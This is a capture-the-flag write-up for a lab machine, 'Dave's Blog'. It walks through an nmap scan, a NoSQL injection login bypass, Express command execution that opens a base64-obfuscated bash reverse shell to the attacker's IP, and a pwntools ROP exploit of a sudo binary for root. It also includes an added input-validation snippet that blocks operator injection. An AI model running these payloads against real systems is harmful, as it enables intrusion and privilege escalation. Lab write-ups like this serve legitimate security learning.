Port scanning

sudo nmap --min-rate 10000 -p- 10.10.236.185 -A
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 07:06 UTC
Nmap scan report for 10.10.236.185
Host is up (0.33s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9:31:1f:9f:b4:a1:10:9d:a9:69:ec:d5:97:df:1a:34 (RSA)
| 256 e9:f5:b9:9e:39:33:00:d2:7f:cf:75:0f:7a:6d:1c:d3 (ECDSA)
|_ 256 44:f2:51:7f:de:78:94:b2:75:2b:a8:fe:25:18:51:49 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Dave's Blog
| http-robots.txt: 1 disallowed entry
|_/admin
3000/tcp open http Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: Dave's Blog
8989/tcp closed sunwebadmins
Aggressive OS guesses: HP P2000 G3 NAS device (89%), Linux 2.6.32 (88%), Linux 2.6.32 - 3.1 (88%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (88%), Linux 3.7 (88%), Linux 5.0 (88%), Linux 5.0 - 5.4 (88%), Linux 5.1 (88%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (88%), Linux 2.6.32 - 3.13 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8989/tcp)
HOP RTT ADDRESS
1 329.73 ms 10.11.0.1
2 329.91 ms 10.10.236.185

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.61 seconds

Web

Two web ports are open; visiting them, both appear to serve the same site. Directory brute-forcing turns up /admin, but submitting login attempts there produces no response at all, which is odd.

The room hint is NoSQL, which I was encountering for the first time, so I read up on it a little. Viewing the page source reveals a JS script; roughly, it POSTs the username and password as JSON.

So I changed the request to JSON.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#tools

This page has many NoSQL payloads; I chose

{"username": {"$ne": null}, "password": {"$ne": null}}

which matches documents in the database whose username and password are both non-null.
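As an added, defender-side example that is not part of the original writeup: an input check for an Express/MongoDB login route that rejects the operator injection above, because a handler that passes req.body straight into a query lets {"$ne": null} match any user. The function names (containsOperator, validateLogin, rejectOperators) and the sample request bodies are my own, constructed for this demonstration.

```javascript
// Added defender-side example, not code from the original writeup.
// Constructed sample bodies: the payload used above and a legitimate login.
const injectedLogin = { username: { $ne: null }, password: { $ne: null } };
const normalLogin = { username: 'dave', password: 'correct-horse' };

// Recursively check whether any key starts with "$" (query operators such as
// $ne, $gt, $regex) or contains "." (field-path traversal). Depth-limited so
// a deeply nested body cannot exhaust the stack.
function containsOperator(value, depth = 0) {
  if (depth > 32 || value === null || typeof value !== 'object') return false;
  if (Array.isArray(value)) return value.some((v) => containsOperator(v, depth + 1));
  for (const [key, child] of Object.entries(value)) {
    if (key.startsWith('$') || key.includes('.')) return true;
    if (containsOperator(child, depth + 1)) return true;
  }
  return false;
}

// Validate a login body before it reaches a findOne({ username, password })
// query. Both fields must be plain strings, so an object like {"$ne": null}
// can never turn the query into "match any user".
function validateLogin(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { ok: false, reason: 'body must be a JSON object' };
  }
  if (containsOperator(body)) {
    return { ok: false, reason: 'query operators are not allowed' };
  }
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return { ok: false, reason: 'username and password must be strings' };
  }
  return { ok: true, username, password };
}

// Express-style middleware (hypothetical; no express import needed) that
// blocks operator-bearing bodies with HTTP 400 and logs them for detection.
function rejectOperators(req, res, next) {
  if (containsOperator(req.body)) {
    console.warn(`NoSQL operator in request body from ${req.ip}`);
    return res.status(400).json({ error: 'invalid request body' });
  }
  return next();
}
```

The same check also catches variants such as {"$regex": "^T"} on the password field, which would otherwise allow the stored secret to be recovered character by character.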

The response then contains a JWT, which can be decoded in CyberChef:

{
  "isAdmin": true,
  "_id": "5ec6e5cf1dc4d364bf864107",
  "username": "dave",
  "password": "THM{SuperSecureAdminPassword123}",
  "__v": 0,
  "iat": 1701417856
}

Log in with the username and password obtained this way.

Getshell

This leads to a command-execution page: entering 7*7 returns 49, which confirms that input really is executed. Since I am unfamiliar with the Express framework, I searched for Express RCE techniques and found this:

require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMS4zOC4yNDUvMTIzNCAwPiYx | base64 -d | bash').toString();

The content after echo is the base64 encoding of the following reverse shell:

bash -i >& /dev/tcp/10.11.38.245/1234 0>&1

Then, to make the shell more usable:

export TERM=xterm-color

python3 -c "import pty;pty.spawn('/bin/bash')"

The home directory contains a script that is executed as root and is readable, writable and executable by all users, used for

The hint tells us to dig into the MongoDB database; the site is presumably built on Node.js and MongoDB.

Typing mongo opens the MongoDB shell, and the third flag is in the whatcouldthisbes collection:

db.whatcouldthisbes.find()

Privilege escalation

sudo -l

This shows that a uid_checker binary can be run with sudo, so I decompiled it in IDA

and found the fourth flag in the main function.

Besides that, there is a backdoor function that spawns /bin/sh, which looks like the ret2text pattern from PWN challenges.

But it seems to involve ROP chains and the like, which I haven't learned yet and don't plan to learn for now, so I borrowed someone else's exploit:

from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64

offset = 88 # Found with ropstar

# ROP chain: gets() reads a string into .bss, then system() is called on it
payload = cyclic(offset)
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x4005b0) # gets()
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x400570) # system()

# host left blank in the original; key-based login for dave is set up below
s = ssh(host='', user='dave', keyfile='./key')

p = s.process(['sudo', '/uid_checker'])
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline(b"/bin/sh") # the string gets() stores in .bss
p.interactive(prompt='')

Before running the script, dave's remote login has to be switched to key-based authentication:

ssh-keygen

Generate a key pair.

cp id_rsa.pub authorized_keys

Then copy id_rsa to the local machine.

Afterthoughts

This room had a lot of things that were very unfamiliar to me: Node.js, Express, MongoDB. The final exploitation was fairly hard as well. I'll find time to study these in more detail.